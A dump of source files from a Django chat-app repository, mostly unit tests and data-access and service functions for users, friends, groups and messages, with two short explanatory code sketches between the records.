{\"id\":5,\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n friendRelation2 = {\"id\":6,\"user_from_id\":user_to_id,\"user_to_id\":user_from_id,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n before = len(FriendRelation.objects.all())\n print(\"testInsertFriendRelation before:\")\n print(FriendRelation.objects.all())\n insertFriendRelation(**friendRelation)\n insertFriendRelation(**friendRelation2)\n after = len(FriendRelation.objects.all())\n print(\"testInsertFriendRelation 1+4 (4+1) after:\")\n print(FriendRelation.objects.all())\n self.assertEqual(after-before,2)\n\n def testGetFriendRelationById(self):\n print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getFriendRelationById(1).id,1)\n print(getFriendRelationById(1))\n self.assertEqual(getFriendRelationById(2).id,2)\n print(getFriendRelationById(2))\n\n def testUpdateFriendRelation(self):\n modified_friendRelation = 
{\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":False,\"top\":True}\n updateFriendRelation(**modified_friendRelation)\n self.assertEqual(getFriendRelationById(1).top,True)\n print(\"testUpdateFriendRelation top = True\")\n print(getFriendRelationById(1))\n\n def testDeleteFriendRelation(self):\n deleteFriendRelation(1)\n deleteFriendRelation(2)\n deleteFriendRelation(3)\n print(\"testDeleteAddFriend id=1||2||3:\")\n print(FriendRelation.objects.all())\n"
},
{
"alpha_fraction": 0.6663066744804382,
"alphanum_fraction": 0.6943844556808472,
"avg_line_length": 33.712501525878906,
"blob_id": "2a984e2cb955ad559c2bf65a460823dfbe62a249",
"content_id": "8e64984eaea153c41b5fdfc442c9d401b5386f9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 80,
"path": "/zzc/adam2014/AllTest/ViewTest/testSigninView.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom adam2014.models import User\nfrom django.test import TestCase\nfrom django.test import Client\nimport json\n# 这个Client是用来模拟Get和Post的\n\n# If your tests rely on database access such as creating or querying models, \n# be sure to create your test classes as subclasses of django.test.TestCase rather than unittest.TestCase.\n# Create your tests here.\n# you can simulate requests, insert test data, inspect your application’s output and generally verify your code is doing what it should be doing.\n\n# 每个view一个类去测试\nclass SigninTest(TestCase):\n\tdef setUp(self):\n\t\t# 并不会真的从数据库取数据来测,而是自己设定测试用的数据\n\t\tself.client = Client()\n\n\t\tself.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n\t\tself.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n\t\t\n\t\tself.users = []\n\t\tself.users.append(self.user)\n\t\tself.users.append(self.user2)\n\t\t\n\t\tUser.objects.create(**self.user)\n\t\tUser.objects.create(**self.user2)\n\n\t\tself.code_set = [\"\",]\n\t\tself.phone_set = [\"\",]\n\t\tself.password_set = [\"\",]\n# code phone password\n# 每个变量的有和无一共构成8种情况(苦逼吧),然后对应与每个有,也有存在和不存在两种情况\n# 一共27种情况\n# code_set phone_set password_set\n# 每个set有一个空\n# 如果phone和code同时有,直接失败\n# 如果只有一个,则去filter判断\n\n# 规则\n# \n\tdef makeCodeSet(self):\n\t\tfor a in self.users:\n\t\t\tself.code_set.append(a[\"code\"])\n\t\t\tself.phone_set.append(a[\"phone\"])\n\t\t\tself.password_set.append(a[\"password\"])\n\n\t# 可以通过遍历来简化\n\tdef test_details(self):\n\t\t# 三个for-in\n\t\t# 如果符合二选一并且密码正确的返回成功,不符合返回错误\n\t\tself.makeCodeSet()\n\t\tfor code in self.code_set:\n\t\t\tfor phone in self.phone_set:\n\t\t\t\tif (code and phone) or ((not code) and (not phone)):\n\t\t\t\t\t# 如果两个都有或者两个都无,直接判断失败\n\t\t\t\t\tself.do_test(code,phone,\"whatever\",0)\n\t\t\t\t\tcontinue\n\t\t\t\tfor password in self.password_set:\n\t\t\t\t\t# code和phone二选一才能进入这里\n\t\t\t\t\tif not password: # 如果password为空,直接判断失败\n\t\t\t\t\t\t# print json.dumps({\"code\":code,\"phone\":phone,\"password\":password})\n\t\t\t\t\t\tself.do_test(code,phone,password,0)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif not code == \"\" : # 如果code不为空\n\t\t\t\t\t\tsuccess = User.objects.filter(code=code,password=password) \n\t\t\t\t\telse:\n\t\t\t\t\t\tsuccess = User.objects.filter(phone=phone,password=password)\n\t\t\t\t\t# print json.dumps({\"code\":code,\"phone\":phone,\"password\":password})\n\t\t\t\t\tself.do_test(code,phone,password,len(success))\n\n\tdef do_test(self,code,phone,password,success):\n\t\tjson_string = {\"code\":code,\"phone\":phone,\"password\":password}\n\t\tdata = {\"data\":json.dumps(json_string)}\n\t\tresponse = self.client.post('/adam2014/signin/', data)\n\t\tself.assertEqual(response.content,json.dumps({\n\t\t\"success\":success,\n\t\t}))\n\n"
},
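do_test() above shows the wire format the sign-in view expects: a form field named "data" holding a JSON string. One concrete request/assertion in isolation, using the first fixture's credentials (a sketch; it assumes the same URL and response shape as the test):

```python
import json
from django.test import Client

client = Client()
payload = {"data": json.dumps({"code": "111111111", "phone": "",
                               "password": "7654321"})}
response = client.post('/adam2014/signin/', payload)
assert response.content == json.dumps({"success": 1})
```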
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "bc6a319205172f471144f02e4afcbde61ff6222d",
"content_id": "3f47eacb549e8cddbdf579f1fb7316393630aa5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/zzc/adam2014/IM/__init__.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n"
},
{
"alpha_fraction": 0.5765543580055237,
"alphanum_fraction": 0.6337989568710327,
"avg_line_length": 45.18987274169922,
"blob_id": "e4df040a2a5c00e90ef735b35affa43a4346ee4b",
"content_id": "23b3fe1977db40545648e0087a9a822026e5d70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3697,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 79,
"path": "/zzc/adam2014/AllTest/DAOTest/testGroupRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'flower_type'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.UserDAO import *\nfrom adam2014.models import User\nfrom adam2014.DAO.GroupDAO import *\nfrom adam2014.models import Group\nfrom adam2014.DAO.GroupRelationDAO import *\nfrom adam2014.models import GroupRelation\nimport datetime\n\nclass GroupRelationDAO(TestCase):\n def setUp(self):\n self.time = datetime.datetime.now()\n\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank3\",\"photo\":\"this is a photo\",\"phone\":\"111111112\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n self.groupRelation1 = {\"id\":1, \"time\":str(self.time), \"group_id\":1, \"user_id\":1}\n self.groupRelation2 = {\"id\":2, \"time\":str(self.time), \"group_id\":1, \"user_id\":2}\n self.groupRelation3 = {\"id\":3, \"time\":str(self.time), \"group_id\":2, \"user_id\":2}\n self.groupRelation4 = {\"id\":4, \"time\":str(self.time), \"group_id\":2, \"user_id\":3}\n GroupRelation.objects.create(**self.groupRelation1)\n GroupRelation.objects.create(**self.groupRelation2)\n GroupRelation.objects.create(**self.groupRelation3)\n GroupRelation.objects.create(**self.groupRelation4)\n\n\n def test_insertGroupRelation(self):\n print(\"insertTest\")\n print(\"insertInform: id=5, group_id=1, user_id=3\")\n groupRelation5 = {\"id\":5, \"time\":str(self.time), \"group_id\":1, \"user_id\":3}\n before = len(GroupRelation.objects.all())\n insertGroupRelation(**groupRelation5)\n after = len(GroupRelation.objects.all())\n print(\"insertResult:\")\n print(GroupRelation.objects.all())\n self.assertEqual(after-before,1)\n\n\n def test_getGroupRelationById(self):\n print(\"getTest\")\n print(\"getInform: id=1, id=3\")\n print(\"getResult:\")\n print(getGroupRelationById(1))\n print(getGroupRelationById(3))\n self.assertEqual(getGroupRelationById(1).id,1)\n self.assertEqual(getGroupRelationById(3).id,3)\n\n #对于GroupRelation这个表,不需要用到更新这一DAO,故此处进行注释\n # def test_updateGroupRelation(self):\n # print(\"updateTest\")\n # print(\"updateInform: id=1, time\")\n # modified_groupRelation = {\"id\":1, \"time\":\"2014-11-14 23:21:11\", \"group_id\":1, \"user_id\":1}\n # updateGroupRelation(**modified_groupRelation)\n # print(\"updateResult:\")\n # print(getGroupRelationById(1))\n # self.assertEqual(getGroupRelationById(1).time,\"2014-11-14 23:21:11\")\n\n def test_deleteUser(self):\n print(\"deleteTest\")\n print(\"deleteInform: id=1, id=2\")\n deleteGroupRelation(1)\n deleteGroupRelation(2)\n self.assertEqual(len(GroupRelation.objects.filter(id=1)),0)\n self.assertEqual(len(GroupRelation.objects.filter(id=2)),0)\n\n\n"
},
{
"alpha_fraction": 0.7138850092887878,
"alphanum_fraction": 0.7251051664352417,
"avg_line_length": 24.428571701049805,
"blob_id": "301f2297ecc0f4896f561c3d1396dcb1185a011f",
"content_id": "7a3563794c2f909a1cd97849d2c345adac657d3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 713,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 28,
"path": "/zzc/adam2014/DAO/GroupRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\nimport datetime\n\nfrom adam2014.models import GroupRelation\n# class GroupRelation(models.Model):\n# user = models.ForeignKey(User)\n# group = models.ForeignKey(Group)\n# time = models.DateTimeField()\n\ndef insertGroupRelation(**groupRelation):\n g = GroupRelation.objects.create(**groupRelation)\n return g;\n\ndef deleteGroupRelation(id):\n GroupRelation.objects.get(id=id).delete()\n\ndef getGroupRelationById(id):\n return GroupRelation.objects.get(id=id)\n\ndef updateGroupRelation(**kw):\n GroupRelation.objects.filter(id=kw['id']).update(**kw)\n\n"
},
{
"alpha_fraction": 0.676071047782898,
"alphanum_fraction": 0.6927899718284607,
"avg_line_length": 28.90625,
"blob_id": "acdd3f1025c99f2f7f86e1b9ce1eec4d9b977f37",
"content_id": "7dd5881ce202fba6967d817045b04dcfbe63d9bb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1287,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 32,
"path": "/Distance/js/taphold.js",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "var timeOutEvent=0;//定时器 \n//开始按 \nfunction gtouchstart(obj){ \n timeOutEvent = setTimeout(\"longPress()\",500);//这里设置定时器,定义长按500毫秒触发长按事件,时间可以自己改,个人感觉500毫秒非常合适 \n return false; \n}; \n//手释放,如果在500毫秒内就释放,则取消长按事件,此时可以执行onclick应该执行的事件 \nfunction gtouchend(obj){ \n clearTimeout(timeOutEvent);//清除定时器 \n if(timeOutEvent!=0){ \n //这里写要执行的内容(尤如onclick事件) \n chat(obj);\n } \n return false; \n}; \n//如果手指有移动,则取消所有事件,此时说明用户只是要移动而不是长按 \nfunction gtouchmove(obj){ \n clearTimeout(timeOutEvent);//清除定时器 \n timeOutEvent = 0; \n}; \n \n//真正长按后应该执行的内容 \nfunction longPress(obj){ \n timeOutEvent = 0; \n //执行长按要执行的内容,如弹出菜单 \n document.getElementById(\"changestatediv\").style.display=\"\";\n document.getElementById(\"changestatemarkdiv\").style.display=\"\";\n} \nfunction closechangestatediv(){\n\tdocument.getElementById(\"changestatediv\").style.display=\"none\";\n document.getElementById(\"changestatemarkdiv\").style.display=\"none\";\n}\n"
},
{
"alpha_fraction": 0.5801328420639038,
"alphanum_fraction": 0.6280681490898132,
"avg_line_length": 45.15999984741211,
"blob_id": "5b1151732364d50518aeeff39f152daa48f0cbf3",
"content_id": "118af2c79e64b9564e713de4cfc518780f9db1fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3463,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 75,
"path": "/zzc/adam2014/AllTest/DAOTest/testAddFriendDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.AddFriendDAO import *\nfrom adam2014.models import AddFriend\nfrom adam2014.models import User\nimport datetime\n\nclass AddFriendDAOTest(TestCase):\n def setUp(self):\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"111111111\",\"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n self.addfriend1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time)}\n self.addfriend2 = {\"id\":2,\"user_from_id\":1,\"user_to_id\":3,\"time\":str(self.time)}\n self.addfriend3 = {\"id\":3,\"user_from_id\":1,\"user_to_id\":4,\"time\":str(self.time)}\n self.addfriend4 = {\"id\":4,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time)}\n\n AddFriend.objects.create(**self.addfriend1)\n AddFriend.objects.create(**self.addfriend2)\n AddFriend.objects.create(**self.addfriend3)\n AddFriend.objects.create(**self.addfriend4)\n\n\n\n def testInsertAddFriend(self):\n user_from_id = self.user2['id']\n user_to_id = self.user4['id']\n addfriend = {\"id\":5,\"user_from_id\":user_from_id,\"user_to_id\":user_to_id,\"time\":str(self.time)}\n before = len(AddFriend.objects.all())\n print(\"testInsertAddFriend before:\")\n print(AddFriend.objects.all())\n insertAddFriend(**addfriend)\n after = len(AddFriend.objects.all())\n print(\"testInsertAddFriend after:\")\n print(AddFriend.objects.all())\n self.assertEqual(after-before,1)\n\n def testGetAddFriendById(self):\n print(\"testGetAddFriendById 1&2:\")\n self.assertEqual(getAddFriendByuser_to_id(2)[0].id,1)\n print(getAddFriendByuser_to_id(1))\n print(getAddFriendByuser_to_id(3))\n\n def testUpdateAddFriend(self):\n modified_Add = {\"id\":1,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time)}\n updateAddFriend(**modified_Add)\n self.assertEqual(getAddFriendById(1).user_from_id,2)\n self.assertEqual(getAddFriendById(1).user_to_id,1)\n print(\"testUpdateAddFriend user_from_id=2&user_to_id=1\")\n print(getAddFriendById(1))\n\n def testDeleteAddFriend(self):\n deleteAddFriend(1)\n deleteAddFriend(2)\n deleteAddFriend(3)\n print(\"testDeleteAddFriend id=1||2||3:\")\n print(AddFriend.objects.all())\n\n def testIsFriend(self):\n print \"test is friend or not\"\n addfriend = {\"id\": \"\", \"user_to_id\": 2, \"user_from_id\": 4, \"time\": \"\"}\n try:\n print isFriend(**addfriend)\n except:\n print \"not friend\"\n\n"
},
{
"alpha_fraction": 0.5604355931282043,
"alphanum_fraction": 0.6235934495925903,
"avg_line_length": 43.78861618041992,
"blob_id": "bcf02b483fbb3d963d2d70c581afc8835e08969f",
"content_id": "8b52d5b8c4f71c5d4fba97962a72a5d1f07b0d30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5592,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 123,
"path": "/zzc/adam2014/AllTest/ServiceTest/testUserService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.Service.UserService import *\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.models import GroupRelation\nimport datetime\nimport django.db.transaction\n\nclass UserServiceTest(TestCase):\n def setUp(self):\n #构造user\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n #构造两个小组\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n #将user1 user2分别加到group1 和 group2\n self.time = datetime.datetime.now()\n self.grouprelation1 = {\"user_id\":1,\"group_id\":1,\"time\":str(self.time)}\n self.grouprelation2 = {\"user_id\":1,\"group_id\":2,\"time\":str(self.time)}\n self.grouprelation3 = {\"user_id\":2,\"group_id\":1,\"time\":str(self.time)}\n self.grouprelation4 = {\"user_id\":2,\"group_id\":2,\"time\":str(self.time)}\n GroupRelation.objects.create(**self.grouprelation1)\n GroupRelation.objects.create(**self.grouprelation2)\n GroupRelation.objects.create(**self.grouprelation3)\n GroupRelation.objects.create(**self.grouprelation4)\n\n\n def testNewUser(self):\n user4 = {\"id\":4,\"password\":\"12306666\",\"nickname\":\"wudage\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n before = len(User.objects.all())\n print(\"testNewUserbefore:\")\n print(User.objects.all())\n newUser(**user4)\n after = len(User.objects.all())\n print(\"testNewUserafter after:\")\n print(User.objects.all())\n self.assertEqual(after-before,1)\n # 测试except情况,主键重复\n user5 = {\"id\":3,\"password\":\"12306666\",\"nickname\":\"wudage\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n print(\"testNewUser failed because the primary key: \")\n with transaction.atomic():\n u = newUser(**user5)\n self.assertEqual(u,'error')\n print(User.objects.all())\n\n\n def testGetUserById(self):\n self.assertEqual(getUserById(1).id,1)\n self.assertEqual(getUserById(2).id,2)\n #测试except情况,不存在的id\n self.assertEqual(getUserById(4),None)\n self.assertEqual(getUserById(5),None)\n\n def testGetUserByCode(self):\n self.assertEqual(getUserByCode(111111111).id,1)\n self.assertEqual(getUserByCode(111111112).id,2)\n #测试except情况,不存在的code\n self.assertEqual(getUserById(535676766),None)\n self.assertEqual(getUserById(535676777),None)\n\n def testUpdateUser(self):\n user = {\"id\":1,\"password\":\"12306666\",\"nickname\":\"ChenFeng\",\"photo\":\"this is 
a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n print(\"testUpdateUserbefore:frank\")\n print(getUserById(1))\n updateUser(**user)\n print(\"testUpdateUserafter:ChenFeng\")\n print(getUserById(1))\n self.assertEqual(getUserById(1).nickname,\"ChenFeng\")\n\n def testGetUser_Groups(self):\n user1_groups = getUser_Groups(1)\n user2_groups = getUser_Groups(2)\n print(\"testGetUser_Groups:user1_groups\"+str(len(user1_groups)))\n print(user1_groups)\n print(\"testGetUser_Groups:user2_groups\"+str(len(user2_groups)))\n print(user2_groups)\n print(\"testGetUser_Groups: no userid == 4\")\n user0_groups = getUser_Groups(4)\n self.assertEqual(user0_groups,None)\n print(user0_groups)\n print(\"testGetUser_Groups: userid=3,no groups\")\n user00_groups = getUser_Groups(3)\n print(user00_groups)\n\n\n def testGetUser_GroupsByCondition(self):\n self.group1 = {\"code\":\"535676\"}\n self.group2 = {\"code\":\"135604\"}\n user1_groups = getUser_GroupsByCondition(1,**self.group1)\n user2_groups = getUser_GroupsByCondition(2,**self.group2)\n print(\"testGetUser_GroupsByCondition:\")\n print(user1_groups)\n self.assertEqual(len(user2_groups),0)\n print(user2_groups)\n\n def testDeleteUser(self):\n deleteUser(1)\n deleteUser(2)\n print(\"testDeleteUser1&User2:\")\n print(User.objects.all())\n self.assertEqual(len(User.objects.filter(id=1)),0)\n self.assertEqual(len(User.objects.filter(id=2)),0)\n print(\"testDeleteUser: no userid == 4\")\n self.assertEqual(deleteUser(4),'error')\n print(User.objects.all())\n\n"
},
{
"alpha_fraction": 0.7232796549797058,
"alphanum_fraction": 0.7349926829338074,
"avg_line_length": 25.30769157409668,
"blob_id": "49b11b3f7aaf929fc1d9390f9459c24d0b734def",
"content_id": "c12119a86e0916b96c00e772ef6f1e2ec8726876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 683,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/zzc/adam2014/DAO/PictureMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import PictureMessage\n# class PictureMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertPictureMessage(**pictureMessage):\n p = PictureMessage.objects.create(**pictureMessage)\n return p;\n\ndef deletePictureMessage(id):\n PictureMessage.objects.get(id=id).delete()\n\ndef getPictureMessageById(id):\n return PictureMessage.objects.get(id=id)\n\ndef updatePictureMessage(**kw):\n PictureMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6239687204360962,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 17.399999618530273,
"blob_id": "9ed3ed6817a5b15153da54e31cf463c200c83459",
"content_id": "acb0ea46d880a93ae862df8747f3b06f3c523b7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2515,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 125,
"path": "/zzc/adam2014/Service/UserService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n# Service,业务逻辑层,接受来自action过滤后合法的数据,调用不同的DAO来完成业务逻辑。\n# ① Service应该封装DAO的增删查改等接口\n# ②根据业务需求增加一定的接口,一定的事务处理: 单个表的操作只用try except,多个表操作且设计到数据一致性时\n#需要添加事务\n# ③ try except 异常处理\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Group\nfrom adam2014.models import User\nfrom adam2014.DAO import UserDAO\nfrom django.db import IntegrityError, transaction\n\n# Joe test for git555\n\n\ndef newUser(**user):\n try:\n u = UserDAO.insertUser(**user)\n except:\n return \"error\"\n return u\n\n\ndef deleteUser(id):\n try:\n UserDAO.deleteUser(id)\n except:\n return \"error\"\n return 'success'\n\n\ndef getUserById(id):\n u = None\n try:\n u = UserDAO.getUserById(id)\n except:\n pass\n return u\n\n\ndef getUserByCode(code):\n u = None\n try:\n u = UserDAO.getUserByCode(code)\n except:\n pass\n return u\n\n\ndef getUserByPhone(phone):\n u = None\n try:\n u = UserDAO.getUserByPhone(phone)\n except:\n pass\n return u\n\ndef updateUser(**user):\n try:\n UserDAO.updateUser(**user)\n except:\n return 'error'\n return 'success'\n\n\ndef getUser_Groups(id):\n groups = None\n try:\n groups = User.objects.get(id=id).group_set.all()\n except:\n pass\n return groups\n\ndef getUser_GroupsByCondition(id,**group):\n groups = None\n try:\n groups = User.objects.get(id=id).group_set.filter(**group)\n except:\n pass\n return groups\n\ndef getuser_Groups(id):\n groups = getUser_Groups(id)\n if (groups == None):\n return 'error'\n elif (len(groups)==0):\n return 'empty list'\n else:\n return groups\n\ndef validateUserByPhone(phone,password):\n user = False\n try:\n user = UserDAO.validateUserByPhone(phone,password)\n except:\n pass\n return user\n\ndef validateUserByCode(code,password):\n user = False\n try:\n user = UserDAO.validateUserByPhone(code,password)\n except:\n pass\n return user\n\n# 待补充\ndef validateVersion(version):\n\tUserDAO.validateVersion()\n\ndef validateExistPhone(phone):\n user = False\n try:\n user = UserDAO.validateExistPhone(phone)\n except:\n pass\n return user\n\n\n\n"
},
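The header's rule 2 (single-table operations get try/except, multi-table operations get a transaction) is only half-illustrated by this file. A sketch of the multi-table case: adding a group member and bumping ucount atomically. GroupDAO's getGroupById/updateGroup are assumed here to follow the same naming pattern as UserDAO; they are not shown in this dump:

```python
from django.db import transaction
from adam2014.DAO import GroupDAO, GroupRelationDAO

def joinGroup(user_id, group_id, time):
    """Insert the membership row and bump ucount together, or roll both back."""
    try:
        with transaction.atomic():
            GroupRelationDAO.insertGroupRelation(user_id=user_id,
                                                 group_id=group_id, time=time)
            g = GroupDAO.getGroupById(group_id)          # assumed DAO helper
            GroupDAO.updateGroup(id=group_id, ucount=g.ucount + 1)  # assumed
    except Exception:
        return 'error'
    return 'success'
```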
{
"alpha_fraction": 0.8326995968818665,
"alphanum_fraction": 0.8403041958808899,
"avg_line_length": 28.27777862548828,
"blob_id": "8c8c9925e854cfaf4d56958ff1e096729f6625b9",
"content_id": "08cbc6f2baa257fbb1682c7d29ee84c11d3a4aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 18,
"path": "/zzc/adam2014/admin.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom adam2014.models import *\n\nadmin.site.register(User)\nadmin.site.register(Group)\nadmin.site.register(Message)\nadmin.site.register(TextMessage)\nadmin.site.register(PictureMessage)\nadmin.site.register(VoiceMessage)\nadmin.site.register(LocationMessage)\nadmin.site.register(BottlePicture)\nadmin.site.register(ImmediatelyMessage)\nadmin.site.register(AddFriend)\nadmin.site.register(FriendRelation)\nadmin.site.register(GroupRelation)\nadmin.site.register(GroupMessage)"
},
{
"alpha_fraction": 0.5393133759498596,
"alphanum_fraction": 0.5404208302497864,
"avg_line_length": 35.15999984741211,
"blob_id": "21d0605ed7356e4abd144a9b373b77a96ddef41e",
"content_id": "2a1871e977357939f6a4e6f64d840729daf34a86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 903,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 25,
"path": "/zzc/adam2014/JoinModels/Group_user.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
